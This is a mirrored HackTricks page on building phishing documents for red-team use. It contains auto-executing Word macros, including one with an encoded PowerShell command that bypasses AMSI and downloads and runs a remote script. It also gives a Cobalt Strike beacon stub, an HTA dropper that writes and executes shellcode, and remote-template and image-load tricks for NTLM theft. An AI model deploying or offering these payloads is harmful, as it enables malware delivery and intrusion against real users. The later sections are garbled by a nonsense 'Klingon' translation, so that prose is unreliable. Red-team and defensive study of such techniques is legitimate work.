Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 06:00:40 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

8.7 KiB
Raw Permalink Blame History

Phishing Files & Documents

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Office Documents

Microsoft Word performs file data validation before opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.

Usually, Word files containing macros use the .docm extension. However, it's possible to rename the file by changing the file extension and still keep their macro executing capabilities.
For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.
The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).

You can use the following command to check which extensions are going to be executed by some Office programs:

assoc | findstr /i "word excel powerp"

Phishing Documents

DOCX files referencing a remote template (File Options Add-ins Manage: Templates Go) that includes macros can “execute” macros as well.

External Image Load

Go to: Insert --> Quick Parts --> Field
Categories: Links and References, Filed names: includePicture, and Filename or URL: http://<ip>/whatever

Macros Backdoor

It's possible to use macros to run arbitrary code from the document.

Autoload functions

The more common they are, the more probable the AV will detect them.

  • AutoOpen()
  • Document_Open()

Macros Code Examples

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Manually remove metadata

File > Info > Inspect Document > Inspect Document laH, Document Inspector jImej. Inspect 'ej Document Properties and Personal Information DaH Remove All 'e' vItlhutlh.

Doc Extension

Qav, Save as type dropdown, .docx format Word 97-2003 .doc vItlhutlh.
vaj macro's .docx vItlhutlh 'ej macro-enabled .docm extension (e.g. thumbnail icon 'e' vItlhutlh ! 'ej web/email gateway vItlhutlh) stigma around 'e'. So, legacy .doc extension vItlhutlh.

Malicious Macros Generators

HTA Files

HTA Windows program 'oH HTML 'ej scripting languages (VBScript 'ej JScript) combine. 'oH "fully trusted" application user interface 'ej execute 'e' vItlhutlh, browser's security model constraints.

HTA mshta.exe execute vItlhutlh, Internet Explorer installed typically, mshta IE dependant vItlhutlh. So, 'oH uninstall, HTAs unable execute.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Forcing NTLM Authentication

Qapla'! NTLM authentication "remotely" ghItlh chel 'e' invisible images 'ej emails HTML 'e' 'oH user access (HTTP MitM?). 'ej victim 'oH files 'ej 'oH trigger authentication 'ej opening folder.

Check ideas pages following:

{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %} places-to-steal-ntlm-creds.md {% endcontent-ref %}

NTLM Relay

Qapla'! hash authentication steal 'ej NTLM relay attacks perform 'ej:

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!